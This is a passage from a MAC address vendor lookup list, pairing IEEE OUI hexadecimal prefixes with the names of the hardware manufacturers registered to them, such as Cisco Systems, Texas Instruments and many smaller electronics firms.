Srl 001E71 MIrcom Group of Companies 001DC4 AIOI Systems Co., Ltd. 001DC0 Enphase Energy 001DBD Versamed Inc. 001DF8 Webpro Vision Technology Corporation 001DF9 Cybiotronics (Far East) Limited 001DF7 R. STAHL Schaltgeräte GmbH 001E05 Xseed Technologies & Computing 001E07 Winy Technology Co., Ltd. 001E0A Syba Tech Limited 001E03 LiComm Co., Ltd. 001E1B Digital Stream Technology, Inc. 001E17 STN BV 001E18 Radio Activity srl 001E15 Beech Hill Electronics 001E30 Shireen Inc 001E2E SIRTI S.p.A. 001DDC HangZhou DeChangLong Tech&Info Co.,Ltd 001DEB DINEC International 001D9A GODEX INTERNATIONAL CO., LTD 001D97 Alertus Technologies LLC 001D91 Digitize, Inc 001D95 Flash, Inc. 001D9D ARTJOY INTERNATIONAL LIMITED 001D9E AXION TECHNOLOGIES 001D70 Cisco Systems, Inc 001D78 Invengo Information Technology Co.,Ltd 001D6F Chainzone Technology Co., Ltd 001D7F Tekron International Ltd 001D79 SIGNAMAX LLC 001DAE CHANG TSENG TECHNOLOGY CO., LTD 001DA6 Media Numerics Limited 001D62 InPhase Technologies 001D63 Miele & Cie. KG 001DB7 Tendril Networks, Inc. 001D8D Fluke Process Instruments GmbH 001D1F Siauliu Tauro Televizoriai, JSC 001D43 Shenzhen G-link Digital Technology Co., Ltd. 001D3F Mitron Pty Ltd 001D39 MOOHADIGITAL CO., LTD 001D37 Thales-Panda Transportation System 001D13 NextGTV 001D14 SPERADTONE INFORMATION TECHNOLOGY LIMITED 001D10 LightHaus Logic, Inc. 001D04 Zipit Wireless, Inc. 001CF2 Tenlon Technology Co.,Ltd. 001D30 YX Wireless S.A. 001CB2 BPT SPA 001CB5 Neihua Network Technology Co.,LTD.(NHN) 001CB4 Iridium Satellite LLC 001CB6 Duzon CNT Co., Ltd. 001CC7 Rembrandt Technologies, LLC d/b/a REMSTREAM 001CBB MusicianLink 001C8D Mesa Imaging 001C89 Force Communications, Inc. 001C87 Uriver Inc. 001CCD Alektrona Corporation 001CEC Mobilesoft (Aust.) Pty Ltd 001CE8 Cummins Inc 001CD0 Circleone Co.,Ltd. 001C9F Razorstream, LLC 001C7D Excelpoint Manufacturing Pte Ltd 001C5C Integrated Medical Systems, Inc. 001C52 VISIONEE SRL 001C47 Hangzhou Hollysys Automation Co., Ltd 001C16 ThyssenKrupp Elevator 001C19 secunet Security Networks AG 001C6C 30805 001C61 GalaxyMicrosystems LImited 001C3B AmRoad Technology Inc. 001C3F International Police Technologies, Inc. 001C28 Sphairon Technologies GmbH 001C1F Quest Retail Technology Pty Ltd 001C32 Telian Corporation 001C2B Alertme.com Limited 001C77 Prodys 001C6F Emfit Ltd 001C49 Zoltan Technology Inc. 001C63 TRUEN 001BDF Iskra Sistemi d.d. 001BD9 Edgewater Wireless Systems Inc 001BC7 StarVedia Technology Inc. 001BEC Netio Technologies Co., Ltd 001C09 SAE Electronic Co.,Ltd. 001C0C TANITA Corporation 001BA6 intotech inc. 001BA4 S.A.E Afikim 001BB4 Airvod Limited 001BB6 Bird Electronic Corp. 001BE8 Ultratronik GmbH 001BE1 ViaLogy 001B93 JC Decaux SA DNT 001B9B Hose-McCann Communications 001B9C SATEL sp. z o.o. 001B92 l-acoustics 001B8E Hulu Sweden AB 001B45 ABB AS, Division Automation Products 001B3F ProCurve Networking by HP 001B41 General Infinity Co.,Ltd. 001B50 Nizhny Novgorod Factory named after M.Frunze, FSUE (NZiF) 001B47 Futarque A/S 001B6C LookX Digital Media BV 001B6B Swyx Solutions AG 001B69 Equaline Corporation 001B76 Ripcode, Inc. 001B70 IRI Ubiteq, INC. 001B68 Modnnet Co., Ltd 001B62 JHT Optoelectronics Co.,Ltd. 001B8A 2M Electronic A/S 001B80 LORD Corporation 001B3E Curtis, Inc. 001B37 Computec Oy 001B07 Mendocino Software 001B08 Danfoss Drives A/S 001B01 Applied Radio Technologies 001B02 ED Co.Ltd 001AFC ModusLink Corporation 001B10 ShenZhen Kang Hui Technology Co.,ltd 001B0B Phidgets Inc. 001B0C Cisco Systems, Inc 001AE0 Mythology Tech Express Inc. 001AE2 Cisco Systems, Inc 001AD7 Christie Digital Systems, Inc. 001B23 SimpleComTools 001AF6 Woven Systems, Inc. 001AF9 AeroVIronment (AV Inc) 001B30 Solitech Inc. 001B18 Tsuken Electric Ind. Co.,Ltd 001AE7 Aztek Networks, Inc. 001A95 Hisense Mobile Communications Technoligy Co.,Ltd. 001A81 Zelax 001A87 Canhold International Limited 001A88 Venergy,Co,Ltd 001AC1 3Com Ltd 001ABB Fontal Technology Incorporation 001ABD Impatica Inc. 001AAE Savant Systems LLC 001ACD Tidel Engineering LP 001AC9 SUZUKEN CO.,LTD 001A79 TELECOMUNICATION TECHNOLOGIES LTD. 001AAA Analogic Corp. 001A8B CHUNIL ELECTRIC IND., CO. 001A8D AVECS Bergen GmbH 001AB4 FFEI Ltd. 001AB5 Home Network System 001AA4 Future University-Hakodate 001A9F A-Link Ltd 001A74 Procare International Co 001ABE COMPUTER HI-TECH INC. 001A19 Computer Engineering Limited 001A18 Advanced Simulation Technology inc. 001A58 CCV Deutschland GmbH - Celectronic eHealth Div. 001A5E Thincom Technology Co.,Ltd 001A5C Euchner GmbH+Co. KG 001A5B NetCare Service Co., Ltd. 001A24 Galaxy Telecom Technologies Ltd 001A20 CMOTECH Co. Ltd. 001A4E NTI AG / LinMot 001A52 Meshlinx Wireless Inc. 001A13 Wanlida Group Co., LTD 001A0F Sistemas Avanzados de Control, S.A. 001A43 Logical Link Communications 001A47 Agami Systems, Inc. 001A2D The Navvo Group 001A2F Cisco Systems, Inc 0019A9 Cisco Systems, Inc 0019AE Hopling Technologies b.v. 0019AF Rigol Technologies, Inc. 0019DE MOBITEK 0019E5 Lynx Studio Technology, Inc. 0019DB MICRO-STAR INTERNATIONAL CO., LTD. 001A03 Angel Electronics Co., Ltd. 0019F9 TDK-Lambda 0019CE Progressive Gaming International 0019BD New Media Life 0019F2 Teradyne K.K. 0019A7 ITU-T 00199F DKT A/S 00198D Ocean Optics, Inc. 001982 SmarDTV 001985 IT Watchdogs, Inc 001951 NETCONS, s.r.o. 001957 Saafnet Canada Inc. 001958 Bluetooth SIG, Inc. 001956 Cisco Systems, Inc 00196B Danpex Corporation 00193D GMC Guardian Mobility Corp. 001986 Cheng Hongjian 00199E Nifty 00196A MikroM GmbH 0018FF PowerQuattro Co. 0018F4 EO TECHNICS Co., Ltd. 0018FC Altec Electronic AG 0018F6 Thomson Telecom Belgium 0018F5 Shenzhen Streaming Video Technology Company Limited 0018F9 VVOND, Inc. 00193B LigoWave 001935 DUERR DENTAL AG 001910 Knick Elektronische Messgeraete GmbH & Co. KG 001913 Chuang-Yi Network Equipment Co.Ltd. 0018FA Yushin Precision Equipment Co.,Ltd. 0018EA Alltec GmbH 0018E8 Hacetron Corporation 001914 Winix Co., Ltd 001906 Cisco Systems, Inc 001901 F1MEDIA 001931 Balluff GmbH 0018E3 Visualgate Systems, Inc. 00189F Lenntek Corporation 001899 ShenZhen jieshun Science&Technology Industry CO,LTD. 00186D Zhenjiang Sapphire Electronic Industry CO. 00186F Setha Industria Eletronica LTDA 001875 AnaCise Testnology Pte Ltd 0018C1 Almitec Informática e Comércio 0018C4 Raba Technologies LLC 0018C9 EOps Technology Limited 0018D8 ARCH METER Corporation 0018D9 Santosha Internatonal, Inc 0018CF Baldor Electric Company 0018BC ZAO NVP Bolid 0018B7 D3 LED, LLC 001895 Hansun Technologies Inc. 001883 FORMOSA21 INC. 00188E Ekahau, Inc. 001814 Mitutoyo Corporation 001817 D. E. Shaw Research, LLC 001811 Neuros Technology International, LLC. 0017DE Advantage Six Ltd 0017D7 ION Geophysical Corporation Inc. 001837 Universal ABIT Co., Ltd. 001822 CEC TELECOM CO.,LTD. 001820 w5networks 00185D TAIGUEN TECHNOLOGY (SHEN-ZHEN) CO., LTD. 00185E Nexterm Inc. 001828 e2v technologies (UK) ltd. 001835 Thoratec / ITC 001801 Actiontec Electronics, Inc 0017F3 Harris Corporation 00184A Catcher, Inc. 00184B Las Vegas Gaming, Inc. 00180E Avega Systems 0017BC Touchtunes Music Corporation 0017C1 CM Precision Technology LTD. 0017B2 SK Telesys 0017B1 ACIST Medical Systems, Inc. 0017A3 MIX s.r.l. 0017A6 YOSIN ELECTRONICS CO., LTD. 00179C DEPRAG SCHULZ GMBH u. CO. 001796 Rittmeyer AG 0017E1 DACOS Technologies Co., Ltd. 0017E0 Cisco Systems, Inc 0017D2 THINLINX PTY LTD 001785 Sparr Electronics Ltd 001775 TTE Germany GmbH 0017B8 NOVATRON CO., LTD. 0017BB Syrinx Industrial Electronics 00177C Smartlink Network Systems Limited 001781 Greystone Data System, Inc. 00178D Checkpoint Systems, Inc. 00178E Gunnebo Cash Automation AB 0017C7 MARA Systems Consulting AB 00175D Dongseo system. 001750 GSI Group, MicroE Systems 001755 GE Security 00171D DIGIT 001718 Vansco Electronics Oy 001719 Audiocodes USA, Inc 001776 Meso Scale Diagnostics, LLC 001779 QuickTel 001767 Earforce AS 001739 Bright Headphone Electronics Company 00172C TAEJIN INFOTECH 001751 Online Corporation 00174C Millipore 001745 INNOTZ CO., Ltd 001748 Neokoros Brasil Ltda 001763 Essentia S.p.A. 001701 KDE, Inc. 0016F6 Video Products Group 0016EE Royaldigital Inc. 0016DE FAST Inc 0016DA Futronic Technology Co. Ltd. 0016D4 Compal Communications, Inc. 0016D7 Sunways AG 0016FF Wamin Optocomm Mfg Corp 0016D1 ZAT a.s. 0016C5 Shenzhen Xing Feng Industry Co.,Ltd 0016CC Xcute Mobile Corp. 001717 Leica Geosystems AG 001715 Qstik 00170E Cisco Systems, Inc 001705 Methode Electronics 0016AA Kei Communication Technology Inc. 0016A8 CWT CO., LTD. 0016A6 Dovado FZ-LLC 0016ED Utility, Inc 0016C7 Cisco Systems, Inc 001671 Symphox Information Co. 001669 MRV Communication (Networks) LTD 001668 Eishin Electronics 001640 Asmobile Communication Inc. 00163C Rebox B.V. 00167D Sky-Line Information Co., Ltd. 001677 Bihl + Wiedemann GmbH 001655 FUHO TECHNOLOGY Co., LTD 001646 Cisco Systems, Inc 001648 SSD Company Limited 001672 Zenway enterprise ltd 00165A Harman Specialty Group 001659 Z.M.P. RADWAG 0016A2 CentraLite Systems, Inc. 001695 AVC Technology (International) Limited 0015D8 Interlink Electronics 0015D4 Emitor AB 0015D5 NICEVT 00160C LPLDEVELOPMENT S.A. DE C.V 00160B TVWorks LLC 001603 COOLKSKY Co., LTD 0015EA Tellumat (Pty) Ltd 0015E2 Dr.Ing. Herbert Knauer GmbH 0015E1 Picochip Ltd 0015DF Clivet S.p.A. 00161D Innovative Wireless Technologies, Inc. 001611 Altecon Srl 001609 Unitech electronics co., ltd. 0015F5 Sustainable Energy Systems 0015F1 KYLINK Communications Corp. 001623 Interval Media 001619 Lancelan Technologies S.L. 001625 Impinj, Inc. 001586 Xiamen Overseas Chinese Electronic Co., Ltd. 00157E Weidmüller Interface GmbH & Co. KG 001580 U-WAY CORPORATION 00157C Dave Networks, Inc. 00157F ChuanG International Holding CO.,LTD. 0015B3 Caretech AB 0015AA Rextechnik International Co., 0015A6 Digital Electronics Products Ltd. 00159D Tripp Lite 0015D6 OSLiNK Sp. z o.o. 001592 Facom UK Ltd (Melksham) 00158B Park Air Systems Ltd 001576 LABiTec - Labor Biomedical Technologies GmbH 0015BE Iqua Ltd. 0015C7 Cisco Systems, Inc 00155E Morgan Stanley 00150B SAGE INFOTECH LTD. 001507 Renaissance Learning Inc 001508 Global Target Enterprise Inc 001502 BETA tech 0014FD Thecus Technology Corp. 0014FC Extandon, Inc. 0014F8 Scientific Atlanta 0014F7 CREVIS Co., LTD 001515 Leipold+Co.GmbH 00150F mingjong 00155C Dresser Wayne 001559 Securaplane Technologies, Inc. 001557 Olivetti 001554 Atalum Wireless S.A. 00153B EMH metering GmbH & Co. KG 001537 Ventus Networks 001533 NADAM.CO.,LTD 001534 A Beltrónica-Companhia de Comunicações, Lda 00153F Alcatel Alenia Space Italia 001518 Shenzhen 10MOONS Technology Development CO.,Ltd 001526 Remote Technologies Inc 0014F1 Cisco Systems, Inc 0014EA S Digm Inc. (Safe Paradigm Inc.) 0014E5 Alticast 00149F System and Chips, Inc. 0014B3 CoreStar International Corp 0014B1 Axell Wireless Limited 0014E0 LET'S Corporation 0014E2 datacom systems inc. 0014E4 infinias, LLC 0014CC Zetec, Inc. 0014CB LifeSync Corporation 0014C6 Quixant Ltd 001498 Viking Design Technology 001496 Phonic Corp. 001493 Systimax Solutions 0014DB Elma Trenew Electronic GmbH 00143A RAYTALK INTERNATIONAL SRL 001436 Qwerty Elektronik AB 00146B Anagran, Inc. 001461 CORONA CORPORATION 001462 Digiwell Technology, inc 001463 IDCS N.V. 001465 Novo Nordisk A/S 001474 K40 Electronics 00146F Kohler Co 001466 Kleinhenz Elektronik GmbH 00147F Thomson Telecom Belgium 001475 Wiline Networks, Inc. 001486 Echo Digital Audio Corporation 001482 Aurora Networks 001455 Coder Electronics Corporation 00144E SRISA 00148D Cubic Defense Simulation Systems 00143D Aevoe Inc. 001415 Intec Automation inc. 001410 Suzhou Keda Technology CO.,Ltd 001417 RSE Informations Technologie GmbH 001433 Empower Technologies(Canada) Inc. 001434 Keri Systems, Inc 0013DE Adapt4, LLC 0013DD Abbott Diagnostics 0013D7 SPIDCOM Technologies SA 0013C7 IONOS Co.,Ltd. 001423 J-S Co. NEUROCOM 001425 Galactic Computing Corp. 001419 SIDSA 0013EE JBX Designs Inc. 0013E5 TENOSYS, INC. 0013E2 GeoVision Inc. 001402 kk-electronic a/s 0013FF Dage-MTI of MC, Inc. 0013BC Artimi Ltd 001408 Eka Systems Inc. 0013A7 BATTELLE MEMORIAL INSTITUTE 0013A6 Extricom Ltd 0013A2 MaxStream, Inc 00139F Electronics Design Services, Co., Ltd. 0013A0 ALGOSYSTEM Co., Ltd. 001398 TrafficSim Co.,Ltd 00139B ioIMAGE Ltd. 001396 Acbel Polytech Inc. 001393 Panta Systems, Inc. 00138B Phantom Technologies LLC 001388 WiMedia Alliance 00136E Techmetro Corp. 00136D Tentaculus AB 00136A Hach Lange Sarl 0013B2 Carallon Limited 0013AD Sendo Ltd 0013AA ALS& TEC Ltd. 0013A4 KeyEye Communications 00134D Inepro BV 00134B ToGoldenNet Technology Inc. 001384 Advanced Motion Controls 00137B Movon Corporation 001353 HYDAC Filtertechnik GMBH 001363 Verascape, Inc. 001303 GateConnect 001304 Flaircomm Technologies Co. LTD 0012F9 URYU SEISAKU, LTD. 0012F3 connectBlue AB 001337 Orient Power Home Network Ltd. 001334 Arkados, Inc. 001332 Beijing Topsec Network Security Technology Co., Ltd. 00131F NxtPhase T&D, Corp. 0012DC SunCorp Industrial Limited 0012FF Lely Industries N.V. 00133A VadaTech Inc. 00132A Sitronics Telecom Solutions 0012E5 Time America, Inc. 00130E Focusrite Audio Engineering Limited 001309 Ocean Broadband Networks 001319 Cisco Systems, Inc 00131C LiteTouch, Inc. 00134A Engim, Inc. 0012D7 Invento Networks, Inc. 0012C4 Viseon, Inc. 001293 GE Energy 001294 SUMITOMO ELECTRIC DEVICE INNOVATIONS, INC 001296 Addlogix 0012B3 Advance Wireless Technology Corp. 0012B0 Efore Oyj (Plc) 00127F Cisco Systems, Inc 0012A6 Dolby Australia 0012A4 ThingMagic, LLC 0012A9 3Com Ltd 0012D0 Gossen-Metrawatt-GmbH 001299 Ktech Telecommunications Inc 00128C Woodward Governor 0012B8 G2 Microsystems 00127B VIA Networking Technologies, Inc. 001280 Cisco Systems, Inc 001275 Sentilla Corporation 001276 CG Power Systems Ireland Limited 001271 Measurement Computing Corp 001273 Stoke Inc 001269 Value Electronics 001250 Tokyo Aircaft Instrument Co., Ltd. 001252 Citronix, LLC 001240 AMOI ELECTRONICS CO.,LTD 00122E Signal Technology - AISD 001264 daum electronic gmbh 001261 Adaptix, Inc 001260 Stanton Magnetics,inc. 001231 Motion Control Systems, Inc. 00124B Texas Instruments 00124A Dedicated Devices, Inc. 001243 Cisco Systems, Inc 0011D9 TiVo 0011D2 Perception Digital Ltd 0011CF Thrane & Thrane A/S 0011D4 NetEnrich, Inc 0011D5 Hangzhou Sunyard System Engineering Co.,Ltd. 0011F8 AIRAYA Corp 0011F4 woori-net 0011F6 Asia Pacific Microsystems , Inc. 0011F0 Wideful Limited 0011F1 QinetiQ Ltd 0011ED 802 Global 001211 Protechna Herbst GmbH & Co. KG 001219 General Datacomm LLC 001216 ICP Internet Communication Payment AG 001215 iStor Networks, Inc. 001203 ActivNetworks 0011CC Guangzhou Jinpeng Group Co.,Ltd. 0011C7 Raymarine UK Ltd 0011C9 MTT Corporation 0011DB Land-Cellular Corporation 001224 NexQL Corporation 0011BD Bombardier Transportation 0011AA Uniclass Technology, Co., LTD 001179 Singular Technology Co. Ltd. 00118A Viewtran Technology Limited 001184 Humo Laboratory,Ltd. 0011B1 BlueExpert Technology Corp. 0011A6 Sypixx Networks 0011B5 Shenzhen Powercom Co.,Ltd 0011BB Cisco Systems, Inc 001166 Taelim Electronics Co., Ltd. 001164 ACARD Technology Corp. 0011A2 Manufacturing Technology Inc 00119E Solectron Brazil 001173 SMART Storage Systems 001125 IBM Corp 00111C Pleora Technologies Inc. 00111F Doremi Labs, Inc. 00111D Hectrix Limited 001119 Solteras, Inc. 001150 Belkin Corporation 001146 Telecard-Pribor Ltd 00110D SANBlaze Technology, Inc. 001106 Siemens NV (Belgium) 000FF4 Guntermann & Drunck GmbH 000FF8 Cisco Systems, Inc 00112C IZT GmbH 001114 EverFocus Electronics Corp. 00110E Tsurusaki Sealand Transportation Co. Ltd. 00114C caffeina applied research ltd. 001141 GoodMan Corporation 001155 Sevis Systems 001152 Eidsvoll Electronics AS 000FCF DataWind Research 000FD2 EWA Technologies, Inc. 000FCE Kikusui Electronics Corp. 000FEB Cylon Controls 000FDC Ueda JapanRadio Co., Ltd. 000F8E DONGYANG TELECOM CO.,LTD. 000F91 Aerotelecom Co.,Ltd. 000F87 Maxcess International 000FA1 Gigabit Systems Inc. 000F99 APAC opto Electronics Inc. 000FF5 GN&S company 000FE8 Lobos, Inc. 000FB2 Broadband Pacenet (India) Pvt. Ltd. 000FD7 Harman Music Group 000FD4 Soundcraft 000FAF Dialog Inc. 000FA5 BWA Technology GmbH 000F80 Trinity Security Systems,Inc. 000F32 Lootom Telcovideo Network Wuxi Co Ltd 000F2A Cableware Electronics 000F29 Augmentix Corporation 000F27 TEAL Electronics, Inc. 000F43 Wasabi Systems Inc. 000F48 Polypix Inc. 000F50 StreamScale Limited 000F4E Cellink 000F47 ROBOX SPA 000F18 Industrial Control Systems 000F1D Cosmo Techs Co., Ltd. 000F1B Ego Systems Inc. 000F78 Datacap Systems Inc 000F70 Wintec Industries, inc. 000F74 Qamcom Technology AB 000F6D Midas Engineering 000F5F Nicety Technologies Inc. (NTS) 000F5A Peribit Networks 000F31 Allied Vision Technologies Canada Inc 000F73 RS Automation Co., Ltd 000F3C Endeleo Limited 000EAB Cray Inc 000EAD Metanoia Technologies, Inc. 000EAF CASTEL 000EF8 SBC ASI 000EF9 REA Elektronik GmbH 000EE6 Adimos Systems LTD 000EF6 E-TEN Information Systems Co., Ltd. 000EEA Shadong Luneng Jicheng Electronics,Co.,Ltd 000F0F Real ID Technology Co., Ltd. 000F16 JAY HOW TECHNOLOGY CO., 000EC6 ASIX ELECTRONICS CORP. 000EBF Remsdaq Limited 000EFF Megasolution,Inc. 000EE0 Mcharge 000E9F TEMIC SDS GmbH 000E96 Cubic Defense Applications, Inc. 000E8E SparkLAN Communications, Inc. 000E91 Navico Auckland Ltd 000E48 Lipman TransAction Solutions 000E3E Sun Optronics Inc 000E33 Shuko Electronics Co.,Ltd 000E75 New York Air Brake Corp. 000E7C Televes S.A. 000E66 Hitachi Industry & Control Solutions, Ltd. 000E68 E-TOP Network Technology Inc. 000E5E Raisecom Technology 000E56 4G Systems GmbH & Co. KG 000E55 AUVITRAN 000E73 Tpack A/S 000E72 CTS electronics 000E6E MAT S.A. (Mircrelec Advanced Technology) 000E84 Cisco Systems, Inc 000E87 adp Gauselmann GmbH 000E92 Open Telecom 000E53 AV TECH CORPORATION 000DF9 NDS Limited 000DFD Huges Hi-Tech Inc., 000DFB Komax AG 000E00 Atrie 000DF4 Watertek Co. 000DFA Micro Control Systems Ltd. 000DFC ITFOR Inc. 000DFE Hauppauge Computer Works, Inc. 000DD6 ITILTD 000DD5 O'RITE TECHNOLOGY CO.,LTD 000E0F ERMME 000E10 C-guys, Inc. 000E0A SAKUMA DESIGN OFFICE 000E0E ESA elettronica S.P.A. 000E18 MyA Technology 000E14 Visionary Solutions, Inc. 000E1B IAV GmbH 000E13 Accu-Sort Systems inc. 000DDE Joyteck Co., Ltd. 000DE2 CMZ Sistemi Elettronici 000DDA ALLIED TELESIS K.K. 000DCD GROUPE TXCOM 000DCA Tait Electronics 000DCF Cidra Corp. 000E3A Cirrus Logic 000E3B Hawking Technologies, Inc. 000DEC Cisco Systems, Inc 000DF2 Private 000E27 Crere Networks, Inc. 000DA0 NEDAP N.V. 000D8E Koden Electronics Co., Ltd. 000D8A Winners Electronics Co., Ltd. 000D7E Axiowave Networks, Inc. 000D71 boca systems 000D5A Tiesse SpA 000DB8 SCHILLER AG 000DC4 Emcore Corporation 000D9B Heraeus Electro-Nite International N.V. 000D7C Codian Ltd 000D6B Mita-Teknik A/S 000D43 DRS Tactical Systems Inc. 000D44 Audio BU - Logitech 000D36 Wu Han Routon Electronic Co., Ltd 000D3D Hammerhead Systems, Inc. 000D3E APLUX Communications Ltd. 000D0D ITSupported, LLC 000D06 Compulogic Limited 000D4A Steag ETA-Optik 000D4F Kenwood Corporation 000D47 Collex 000D61 Giga-Byte Technology Co., Ltd. 000D3B Microelectronics Technology Inc. 000D2D NCT Deutschland GmbH 000D1E Control Techniques 000D52 Comart system 000D1A Mustek System Inc. 000CB8 MEDION AG 000CBB ISKRAEMECO 000CC0 Genera Oy 000CA8 Garuda Networks Corporation 000D03 Matrics, Inc. 000CFF MRO-TEK Realty Limited 000CFA Digital Systems Corp 000CFD Hyundai ImageQuest Co.,Ltd. 000CD3 Prettl Elektronik Radeberg GmbH 000CD7 Nallatech Ltd 000CD4 Positron Public Safety Systems inc. 000CD6 PARTNER TECH 000CB9 LEA 000CBD Interface Masters, Inc 000CB2 UNION co., ltd. 000CEB CNMP Networks, Inc. 000CCC Aeroscout Ltd. 000CC7 Intelligent Computer Solutions Inc. 000CBE Innominate Security Technologies AG 000CA7 Metro (Suzhou) Technologies Co., Ltd. 000CEF Open Networks Engineering Ltd 000C64 X2 MSA Group 000CA0 StorCase Technology, Inc. 000C99 HITEL LINK Co.,Ltd 000C5A IBSmm Embedded Electronics Consulting 000C5E Calypso Medical 000C61 AC Tech corporation DBA Advanced Digital 000C5F Avtec, Inc. 000C4B Cheops Elektronik 000C45 Animation Technologies Inc. 000C3C MediaChorus, Inc. 000C7C Internet Information Image Inc. 000C7B ALPHA PROJECT Co.,Ltd. 000C77 Life Racing Ltd 000C69 National Radio Astronomy Observatory 000C66 Pronto Networks Inc 000C88 Apache Micro Peripherals, Inc. 000C82 NETWORK TECHNOLOGIES INC 000C8D MATRIX VISION GmbH 000C89 AC Electric Vehicles, Ltd. 000C4E Winbest Technology CO,LT 000BFE CASTEL Broadband Limited 000BF5 Shanghai Sibo Telecom Technology Co.,Ltd 000C27 Sammy Corporation 000C2A OCTTEL Communication Co., Ltd. 000C1C MicroWeb Co., Ltd. 000BDF Shenzhen RouterD Networks Limited 000BE6 Datel Electronics 000BF2 Chih-Kan Technology Co., Ltd. 000BEB Systegra AG 000BEF Code Corporation 000C05 RPA Reserch Co., Ltd. 000C22 Double D Electronics Ltd 000C0F Techno-One Co., Ltd 000C38 TelcoBridges Inc. 000BAF WOOJU COMMUNICATIONS Co,.Ltd 000BB6 Metalligence Technology Corp. 000BB3 RiT technologies Ltd. 000BB7 Micro Systems Co.,Ltd. 000BBA Harmonic, Inc 000B62 ib-mohnen KG 000B64 Kieback & Peter GmbH & Co KG 000B67 Topview Technology Corporation 000B7D SOLOMON EXTREME INTERNATIONAL LTD. 000B94 Digital Monitoring Products, Inc. 000BAE Vitals System Inc. 000BD9 General Hydrogen 000BAB Advantech Technology (CHINA) Co., Ltd. 000B6D SOLECTRON JAPAN NAKANIIDA 000BC4 BIOTRONIK GmbH & Co 000B57 Silicon Laboratories 000B51 Micetek International Inc. 000B53 INITIUM Co., Ltd. 000AFB Ambri Limited 000AFF Kilchherr Elektronik AG 000B4A Visimetrics (UK) Ltd 000B48 sofrel 000B1E KAPPA opto-electronics GmbH 000B1C SIBCO bv 000B37 MANUFACTURE DES MONTRES ROLEX SA 000AF8 American Telecare Inc. 000B17 MKS Instruments 000B2D Danfoss Inc. 000AA3 SHIMAFUJI ELECTRIC CO.,LTD. 000AA7 FEI Electron Optics 000AA6 Hochiki Corporation 000A9A Aiptek International Inc 000A94 ShangHai cellink CO., LTD 000A97 SONICblue, Inc. 000A92 Presonus Corporation 000A85 PLAT'C2,Inc 000AD0 Niigata Develoment Center,F.I.T. Co., Ltd. 000AD4 CoreBell Systems Inc. 000ACA YOKOYAMA SHOKAI CO.,Ltd. 000ACE RADIANTECH, INC. 000AC7 Unication Group 000ADE Happy Communication Co., Ltd. 000AE2 Binatone Electronics International, Ltd 000ADB Trilliant 000AB8 Cisco Systems, Inc 000AAC TerraTec Electronic GmbH 000ABF HIROTA SS 000ABC Seabridge Ltd. 000A50 REMOTEK CORPORATION 000A58 Freyer & Siegel Elektronik GmbH & Co. KG 000A4E UNITEK Electronics INC. 000A62 Crinis Networks, Inc. 000A6A SVM Microwaves s.r.o. 000A66 MITSUBISHI ELECTRIC SYSTEM & SERVICE CO.,LTD. 000A31 HCV Consulting 004252 RLX Technologies 000A70 MPLS Forum 000A72 STEC, INC. 000A3D Elo Sistemas Eletronicos S.A. 000A46 ARO WELDING TECHNOLOGIES SAS 000A71 Avrio Technologies, Inc 000A64 Eracom Technologies 000A83 SALTO SYSTEMS S.L. 000A86 Lenze 000A3F Data East Corporation 000A0C Scientific Research Corporation 0009F6 Shenzhen Eastern Digital Tech Ltd. 000A20 SVA Networks, Inc. 000A24 Octave Communications 000A19 Valere Power, Inc. 0009E5 Hottinger Baldwin Messtechnik GmbH 0009DE Samjin Information & Communications Co., Ltd. 0009E0 XEMICS S.A. 000A01 SOHOware, Inc. 0009EC Daktronics, Inc. 0009EE MEIKYO ELECTRIC CO.,LTD 0009CA iMaxNetworks(Shenzhen)Limited. 0009CF iAd GmbH 000A11 ExPet Technologies, Inc 000A0F Ilryung Telesys, Inc 0009E7 ADC Techonology 000993 Visteon Corporation 000999 CP GEORGES RENAULT 000994 Cronyx Engineering 0009B9 Action Imaging Solutions 0009AC LANVOICE 0009B1 Kanematsu Electronics, Ltd. 0009B0 Onkyo Corporation 000979 Advanced Television Systems Committee, Inc. 000963 Dominion Lasercom Inc. 000966 TRIMBLE EUROPE BV 0009C1 PROCES-DATA A/S 0009BB MathStar, Inc. 000968 TECHNOVENTURE, INC. 000961 Switchgear and Instrumentation Ltd 00097C Cisco Systems, Inc 00097B Cisco Systems, Inc 00099D Haliplex Communications 00099E Testech, Inc. 000988 Nudian Electron Co., Ltd. 00098E ipcas GmbH 0009AB Netcontrol Oy 000960 YOZAN Inc. 000956 Network Systems Group, Ltd. (NSG) 000900 TMT 000901 Shenzhen Shixuntong Information & Technoligy Co 000913 SystemK Corporation 00090E Helix Technology Inc. 00093C Jacques Technologies P/L 000935 Sandvine Incorporated 000936 Ipetronik GmbH & Co. KG 000937 Inventec Appliance Corp 000946 Cluster Labs GmbH 00093F Double-Win Enterpirse CO., LTD 000948 Vista Control Systems, Corp. 000949 Glyph Technologies Inc. 00092A MYTECS Co.,Ltd. 000925 VSN Systemen BV 0008E0 ATO Technology Ltd. 0008E4 Envenergy Inc 0008E3 Cisco Systems, Inc 0008E5 IDK Corporation 0008D9 Mitadenshi Co.,LTD 000891 Lyan Inc. 000892 EM Solutions 00088C Quanta Network Systems Inc. 00088A Minds@Work 0008FD BlueKorea Co., Ltd. 0008F8 UTC CCS 0008D5 Vanguard Networks Solutions, LLC 0008CD With-Net Inc 0008CC Remotec, Inc. 0008D1 KAREL INC. 0008A7 iLogic Inc. 000899 Netbind, Inc. 0008A0 Stotz Feinmesstechnik GmbH 0008BC Ilevo AB 0008BD TEPG-US 0008AE PacketFront Network Products AB 0008C3 Contex A/S 0008F3 WANY 0008DE 3UP Systems 000822 InPro Comm 000823 Texa Corp. 00081D Ipsil, Incorporated 00082D Indus Teqsite Private Limited 000820 Cisco Systems, Inc 000828 Koei Engineering Ltd. 000824 Nuance Document Imaging 00086C Plasmon LMS 000868 PurOptix 000869 Command-e Technology Co.,Ltd. 000862 NEC Eluminant Technologies, Inc. 000803 Cos Tron 000805 Techno-Holon Corporation 000808 PPT Vision, Inc. 000814 TIL Technologies 00085C Shanghai Dare Technologies Co. Ltd. 00082C Homag AG 000821 Cisco Systems, Inc 000887 Maschinenfabrik Reinhausen GmbH 000877 Liebert-Hiross Spa 00087B RTX Telecom A/S 000861 SoftEnergy Co., Ltd. 00084F Qualstar Corporation 000854 Netronix, Inc. 000876 SDSystem 000870 Rasvia Systems, Inc. 00086E Hyglo AB 0007FD LANergy Ltd. 0007FE Rigaku Corporation 00047D Pelco 0007BF Armillaire Technologies, Inc. 0007BB Candera Inc. 0007BD Radionet Ltd. 0007C4 JEAN Co. Ltd. 0007B6 Telecom Technology Ltd. 0007B7 Samurai Ind. Prods Eletronicos Ltda 0007B0 Office Details, Inc. 0007D9 Splicecom 0007DA Neuro Telecom Co., Ltd. 0007CD Kumoh 